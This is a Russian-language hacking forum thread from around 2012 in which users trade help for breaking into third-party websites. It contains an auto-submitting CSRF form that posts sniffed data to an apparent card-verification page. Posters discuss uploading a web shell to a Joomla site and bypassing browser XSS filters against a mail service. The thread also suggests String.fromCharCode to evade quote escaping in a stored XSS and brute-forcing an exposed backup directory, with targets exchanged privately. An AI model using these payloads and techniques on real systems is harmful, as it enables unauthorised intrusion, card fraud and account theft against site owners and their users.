Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. justonline

    justonline network ninja

    Joined:
    27 Jul 2011
    Messages:
    499
    Likes Received:
    60
    Reputations:
    53
    не было времени) спал я)
    а счас в универе
     
  2. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    Code:
    <html>
    <body onload="document.getElementById('poc').submit();">
    <form id="poc" method="POST" action="http://site.com/addvbv.php" onSubmit="return false;">
    	<input type="hidden" name=ccn value='[тут сниф]'>
    	<input type="hidden" name=capt value=''>
    	<input type="hidden" name=submit value="Check Now"> <!
    name=submit -->
    </form>
    </body>
    </html>
    как-нибудь так

    ты хотя бы перевел, что он там нашел?
     
    _________________________
  3. jacklndn

    jacklndn New Member

    Joined:
    20 Feb 2012
    Messages:
    13
    Likes Received:
    0
    Reputations:
    0
    Попробую

    Я сам не особо понимаю, он весь на английском, Possible secsitive directories насколько я понимаю "Возможно открытая директория"
     
  4. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    нужно понимание того, что выдает тебе сканер, чтобы потом спрашивать «а можно…»
    http://translate.google.ru/
     
    _________________________
  5. jacklndn

    jacklndn New Member

    Joined:
    20 Feb 2012
    Messages:
    13
    Likes Received:
    0
    Reputations:
    0
    Технический перевод
    HTML:
    Возможные secsitive каталоги - 1125
    Каталоги с поддержкой разрешения на выполнение - 17
    Возможны важные файлы - 15
    Каталог резервной проверки - 16
    Файл резервной проверки - 274
    Просто я полагаю в джумлe есть какие-то более-менее универсальные уязвимости?
     
  6. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    http://forum.antichat.ru/thread50600.html
     
    _________________________
  7. jacklndn

    jacklndn New Member

    Joined:
    20 Feb 2012
    Messages:
    13
    Likes Received:
    0
    Reputations:
    0
    Да, я там многие вещи пробовал, но ничего особо не получилось. Там для специальных компонентов джумлы, а я понятия не имею какие на том сайте есть компоненты.
     
  8. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    кто ж тебе открыть сайт мешает и полистать? :)
     
    _________________________
  9. jacklndn

    jacklndn New Member

    Joined:
    20 Feb 2012
    Messages:
    13
    Likes Received:
    0
    Reputations:
    0
    Листаю, там в коде есть только component/mailto
    и несколько users-components (remind pass итп)
    Как-то еще можно проверить, какие компоненты там есть? Сайт довольно простой, не думаю что какие-то модули сверх навороченые туда ставились
     
  10. R0nin

    R0nin Member

    Joined:
    11 Jul 2010
    Messages:
    261
    Likes Received:
    24
    Reputations:
    8
    скинь адрес сайта
     
  11. jacklndn

    jacklndn New Member

    Joined:
    20 Feb 2012
    Messages:
    13
    Likes Received:
    0
    Reputations:
    0
    в личку скинул
     
  12. R0nin

    R0nin Member

    Joined:
    11 Jul 2010
    Messages:
    261
    Likes Received:
    24
    Reputations:
    8
    Из 68 компонент только компонент Content (com_content) найден. База данных сканера небольшая, надо будет потом обновить его.

    update: + com_users
     
    #19492 R0nin, 28 Feb 2012
    Last edited: 28 Feb 2012
  13. jacklndn

    jacklndn New Member

    Joined:
    20 Feb 2012
    Messages:
    13
    Likes Received:
    0
    Reputations:
    0
    Все облазил, но ничего так и не нашел что помогло бы залить шелл.

    Еще отдельный вопрос о xss пассивке для почтовика.
    post xss не хочет работать, однако добрый человек подсказал как вывести ее в get параметр. Но теперь она отказывается работать в ie и хроме. Если хром, это не фатально, то вот с ие очень хотелось чтобы xss работала. Есть ли варианты обойти фильтры ие?
     
  14. R0nin

    R0nin Member

    Joined:
    11 Jul 2010
    Messages:
    261
    Likes Received:
    24
    Reputations:
    8
    Такая вот она жизнь мужик, приходится всякие фильтры обходить)
     
  15. Expl0ited

    Expl0ited Members of Antichat

    Joined:
    16 Jul 2010
    Messages:
    1,035
    Likes Received:
    534
    Reputations:
    935
    линку в личку
     
    _________________________
  16. justonline

    justonline network ninja

    Joined:
    27 Jul 2011
    Messages:
    499
    Likes Received:
    60
    Reputations:
    53
    пытаюсь намутить активную xss на одном сайте. текст сообщения пишется в js скрипт. ковычки " экранируются слешем. есть варианты обхода?
     
  17. R0nin

    R0nin Member

    Joined:
    11 Jul 2010
    Messages:
    261
    Likes Received:
    24
    Reputations:
    8
    Если JS пропускается то кавычки не нужны, потому что есть волшебный метод fromCharCode() объекта String.

    Code:
    document.write(String.fromCharCode(65,66,67,68));
    Результат будет: ABCD
     
  18. JorryGo

    JorryGo New Member

    Joined:
    12 Sep 2011
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    Есть на одном сайтике папка backup не закрытая.
    Не подскажите как могут храниться бекапы? Ничего на эту тему в гугле не нашел.
     
  19. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    JorryGo, не факт что в ней может что-то лежать.
    а бэкап от какого-нибудь движка, типа булки, то просто заебешься брутить.
    ну а так dirbuster-ом на брут поставь папку
     
    _________________________
  20. jacklndn

    jacklndn New Member

    Joined:
    20 Feb 2012
    Messages:
    13
    Likes Received:
    0
    Reputations:
    0
    Скинул
     
Thread Status:
Not open for further replies.